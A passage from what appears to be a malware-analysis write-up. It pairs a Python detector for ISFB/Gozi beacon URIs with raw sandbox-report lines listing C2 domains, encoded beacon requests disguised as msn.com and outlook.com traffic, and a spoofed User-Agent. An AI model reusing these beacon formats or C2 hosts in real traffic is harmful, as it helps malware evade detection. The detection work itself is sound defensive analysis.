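    "Source: global trafficHTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com",
    # Constructed benign control line, not from the report.
    "Source: global trafficHTTP traffic detected: GET /en-us/news HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36Host: www.msn.com",
]

# Request line: method, path and HTTP version, whether or not a ' | ' separator follows.
REQUEST_RE = re.compile(r"HTTP traffic detected:\s*(?P<method>GET|POST)\s+(?P<path>\S+)\s+HTTP/1\.[01]")
# User-Agent and Host may be glued together (as extracted) or separated by ' | '.
UA_HOST_RE = re.compile(r"User-Agent:\s*(?P<ua>.+?)\s*(?:\|\s*)?Host:\s*(?P<host>[^\s|]+)")
# ISFB escapes the '+' and '/' of its base64 payload as _2B and _2F (the two escapes
# visible in the report's paths). The payload is then chopped into path segments, so an
# escape can straddle a '/' (see 'Ert7vY9a_/2Fh6kZ...' above); the check therefore runs
# on the path with the slashes removed.
ESCAPED_B64_RE = re.compile(r"_2[BF]")
BOGUS_EXT_RE = re.compile(r"\.[a-z0-9]{2,4}$")
MIN_SEGMENTS = 6  # assumed threshold; the observed beacons have well over ten


def parse_line(line):
    """Return method/path/ua/host for one report line, or None if it is not a request."""
    m = REQUEST_RE.search(line)
    h = UA_HOST_RE.search(line)
    if not m or not h:
        return None
    return {"method": m["method"], "path": m["path"], "ua": h["ua"], "host": h["host"]}


def assess(req):
    """Attach the ISFB indicators and an overall 'flagged' verdict to a parsed request."""
    segs = [s for s in req["path"].split("/") if s]
    long_chain = len(segs) >= MIN_SEGMENTS
    escaped = bool(ESCAPED_B64_RE.search("".join(segs)))
    bogus_ext = bool(BOGUS_EXT_RE.search(segs[-1])) if segs else False
    # IE8 never shipped on Windows 10, so this User-Agent is a hard-coded fake.
    ua_mismatch = "MSIE 8.0" in req["ua"] and "Windows NT 10.0" in req["ua"]
    # The UA mismatch is supporting evidence only; the verdict rests on the URI shape.
    flagged = long_chain and escaped and bogus_ext
    return {**req, "segments": len(segs), "escaped_b64": escaped,
            "bogus_ext": bogus_ext, "ua_mismatch": ua_mismatch, "flagged": flagged}


def analyse(lines):
    """Parse and assess every request line; non-request lines are skipped."""
    return [assess(r) for r in (parse_line(l) for l in lines) if r]


def flagged_hosts(results):
    """Host headers seen on flagged beacons. Decoy and real C2 hosts look identical here,
    which is exactly why the Host header is a poor detection key for this family."""
    return sorted({r["host"] for r in results if r["flagged"]})


if __name__ == "__main__":
    for r in analyse(SAMPLE_LINES):
        print(f"{'BEACON' if r['flagged'] else 'ok    '} host={r['host']} "
              f"segments={r['segments']} ua_mismatch={r['ua_mismatch']}")
```

Feed it the full list of request lines from this section and the only hosts it reports are the Microsoft decoys, because the report's sandbox never observed a successful connection to areuranel.website or breuranel.website; the same function applied to proxy logs would catch both, since it never looks at the host.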
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.500798053.0000000004D65000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.503518309.00000000053C2000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.518255520.0000000005005000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484636695.0000000001174000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp | String found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484636695.0000000001174000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp | String found in binary or memory: http://ogp.me/ns/fb#
                      Source: rundll32.exe, 00000003.00000003.611937576.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://areuranel.website/
                      Source: rundll32.exe, 00000003.00000003.611937576.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://areuranel.website/liopolo/gPZADesC/LIHFYPg1nfeS6qR4dfr58Og/poTvfxxfV9/7jcxdAxrxlBGvHHC2/KE8j
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp | String found in binary or memory: https://blogs.msn.com/
                      Source: rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://breuranel.website/8
                      Source: rundll32.exe, 00000003.00000003.743394786.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://breuranel.website/X
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp | String found in binary or memory: https://breuranel.website/liopolo/Gu5CX9rKtqJTGdubC/vfDJzFOCWocD/fyvnSBIy2J4/FhQlzlOfNqSLAT/n_2BCGU5
                      Source: rundll32.exe, 00000003.00000003.743394786.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://breuranel.website/liopolo/VQCuXOMQ58gaep/wQcyE3XNRkOUslXiuIoRn/thqxftgA7_2FvfGU/paR5aKKlYUJw
                      Source: rundll32.exe, 00000003.00000003.521631224.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://breuranel.website/liopolo/oPGaMFzTwbyZJ3jE/9_2B3jdhd0kGHjG/n_2BHWHpJci47et543/_2B6aHUxi/oZM9
                      Source: rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.511056929.00000000008E9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478009497.00000000008E8000.00000004.00000001.sdmp | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: rundll32.exe, 00000003.00000003.478075992.00000000008ED000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/logi
                      Source: loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ch
                      Source: rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633984572&rver
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633984576&rver
                      Source: rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.657034849.0000000004C3B000.00000004.00000040.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633984656&rver
                      Source: loaddll32.exe, 00000000.00000003.663941944.000000000359B000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633984659&rver
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.657010952.0000000004C3C000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656854025.0000000000900000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.477941064.00000000008F0000.00000004.00000001.sdmp | String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: rundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000000.00000002.768580069.00000000010C7000.00000004.00000020.sdmp | String found in binary or memory: https://msn.com/e
                      Source: loaddll32.exe, 00000000.00000003.663884041.0000000001176000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com/f
                      Source: rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/Mnijq
                      Source: rundll32.exe, 00000003.00000003.511136188.0000000000889000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/U
                      Source: loaddll32.exe, 00000000.00000003.571505520.000000000112A000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.com/
                      Source: loaddll32.exe, 00000000.00000003.571184163.000000000110E000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfS
                      Source: loaddll32.exe, 00000000.00000002.769550335.0000000001102000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/
                      Source: rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/$
                      Source: rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/;
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/C
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/Q
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/m
                      Source: rundll32.exe, 00000003.00000003.567432017.0000000000894000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.567344794.00000000008EA000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert
                      Source: loaddll32.exe, 00000000.00000003.576353780.0000000001176000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/w
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.752826654.000000000110E000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz
                      Source: rundll32.exe, 00000003.00000003.745980774.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.773684613.0000000000894000.00000004.00000020.sdmp | String found in binary or memory: https://outlook.office365.com/signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MW
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663941944.000000000359B000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478075992.00000000008ED000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.657034849.0000000004C3B000.00000004.00000040.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.657010952.0000000004C3C000.00000004.00000040.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.700067622.0000000000889000.00000004.00000001.sdmp | String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: rundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/
                      Source: rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/&
                      Source: rundll32.exe, 00000003.00000003.657010952.0000000004C3C000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fBqQVObz8g5lnocL%2frDmP1N8TTzvhY7vp6N%2fRS6H6xMUu%2fq
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fM47eTWImwyNJIXk%2fbvBUnXDqSGJkSqnZ1W%2fIoQdQ6MHW%2fB
                      Source: rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fwy2L0fN2E5PVQV%2fdJuGUeMmesCePLL0l7Wgt%2fWGkNYevXDY_
                      Source: loaddll32.exe, 00000000.00000003.663914997.000000000359C000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fytBZeomNqV%2fHSfS_2F75u1_2Bgzu%2ffw3T9nUGqtyA%2fMnMc
                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663941944.000000000359B000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478075992.00000000008ED000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.657034849.0000000004C3B000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/M
                      Source: loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2
                      Source: rundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4l
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmp | String found in binary or memory: https://www.outlook.com/signup
                      Source: rundll32.exe, 00000003.00000003.567344794.00000000008EA000.00000004.00000001.sdmp | String found in binary or memory: https://www.outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_
                      Source: loaddll32.exe, 00000000.00000002.769550335.0000000001102000.00000004.00000001.sdmp | String found in binary or memory: https://www.outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS
                      Source: unknown | DNS traffic detected: queries for: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRopF97I_2/B8CxFQdR/_2BNrlSUvWcd0EwvOdX03BY/sLHqBgEIoN/l5xSyCjNwonJQFrna/xuhuk7iqStO6/LAN01N_2FT3/qYrzxcmDBjbOke/xPgut5GCh0/QPq7LLa.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49749 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49751 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49771 version: TLS 1.2
